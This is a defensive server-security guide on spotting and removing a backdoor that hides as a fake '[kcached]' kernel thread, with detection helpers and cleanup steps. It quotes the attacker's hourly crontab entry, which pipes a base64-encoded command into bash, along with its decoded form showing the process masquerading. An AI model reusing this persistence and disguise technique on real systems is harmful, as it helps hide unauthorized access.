How to deal with malicious kcached processes

If you find something like the following in the process list on your server, you can be sure you have detected malicious activity:

username 2156075 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156076 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]

You can use the lsof command to see which files the process has open, in particular which executable it is really running (the txt entry), and whether they are being used for a legitimate purpose. If you are unsure about the legitimacy of these files or the processes using them, consult a qualified system administrator or security expert.

root@server1 [~]# lsof -p 2156075

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156075 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156075 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156075 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus

Listing the matching files:

ls -1 /home/username/.config/dbus/gs-dbus*

/home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus.dat

At first glance the files appear to belong to a gs-dbus process, which would suggest a component of the GNOME software suite that manages D-Bus connections for graphical applications, with gs-dbus.dat being its configuration or data file.

It is not uncommon for such files to be owned by a user, especially when they relate to user-specific settings, so the file listing alone proves nothing either way.

Inspect crontab of the given user:

root@server1 [~]# crontab -lu username

# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel

If you decode the base64 line you will see more:

/usr/bin/pkill -0 -U2438 gs-dbus 2>/dev/null || SHELL=/usr/local/cpanel/bin/noshell TERM=xterm-256color GS_ARGS="-k /home/username/.config/dbus/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/username/.config/dbus/gs-dbus'" 2>/dev/null
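The triage steps above, as an added shell example (my code, not the post author's): `find_masqueraders` flags user-space processes whose argv[0] is dressed up as a kernel thread name, and `decode_cron_payloads` shows what a base64-wrapped cron entry actually runs. The function names and the optional proc-root argument (which lets the first helper be pointed at a fake /proc tree) are my own assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post. Two triage helpers for the
# pattern described above; function names and the proc-root argument are mine.

# A real kernel thread such as [kworker/0:1] has an empty /proc/PID/cmdline and
# no /proc/PID/exe link. A user process that only renamed its argv[0] with
# `exec -a '[kcached]'` still has both (its comm stays "gs-dbus", which is why
# lsof above shows COMMAND gs-dbus). Print "PID EXE" for every process whose
# argv[0] is bracketed like a kernel thread yet has a real executable behind it.
find_masqueraders() {
    proc_root="${1:-/proc}"
    for d in "$proc_root"/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        argv0=$(tr '\0' '\n' < "$d/cmdline" | head -n 1)
        case "$argv0" in
            '['*']') ;;          # looks like a kernel thread name
            *) continue ;;
        esac
        exe=$(readlink "$d/exe" 2>/dev/null) || continue  # kernel threads have none
        printf '%s %s\n' "${d##*/}" "$exe"
    done
}

# Cron lines of the form `{ echo <base64>|base64 -d|bash;}` hide the real
# command. Read crontab text on stdin and print each embedded payload decoded,
# one per line, so the analyst sees what actually runs on the schedule.
decode_cron_payloads() {
    grep -E 'base64 (-d|--decode)' \
      | sed -n 's#.*echo[[:space:]]\{1,\}\([A-Za-z0-9+/=]\{16,\}\).*#\1#p' \
      | while IFS= read -r b64; do
            decoded=$(printf '%s' "$b64" | base64 -d 2>/dev/null) \
                || decoded="<not valid base64: $b64>"
            printf '%s\n' "$decoded"
        done
}

# Constructed sample: the crontab entry quoted in the post, used for a dry run.
SAMPLE_CRON='0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null'

# Usage on a live system (as root, so every /proc/PID/exe is readable):
#   find_masqueraders
#   crontab -lu username | decode_cron_payloads
printf '%s\n' "$SAMPLE_CRON" | decode_cron_payloads
```

On a live host the first helper will also list harmless programs that happen to use a bracketed argv[0], so treat each hit as a lead to check with lsof, not as a verdict.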

Recommendations:

– Don't ignore the finding
– Kill the processes
– Remove the files
– Remove the cron entry
– Reset all passwords for the affected user
– Scan the account additionally with a reputable malware scanner
– Notify the client
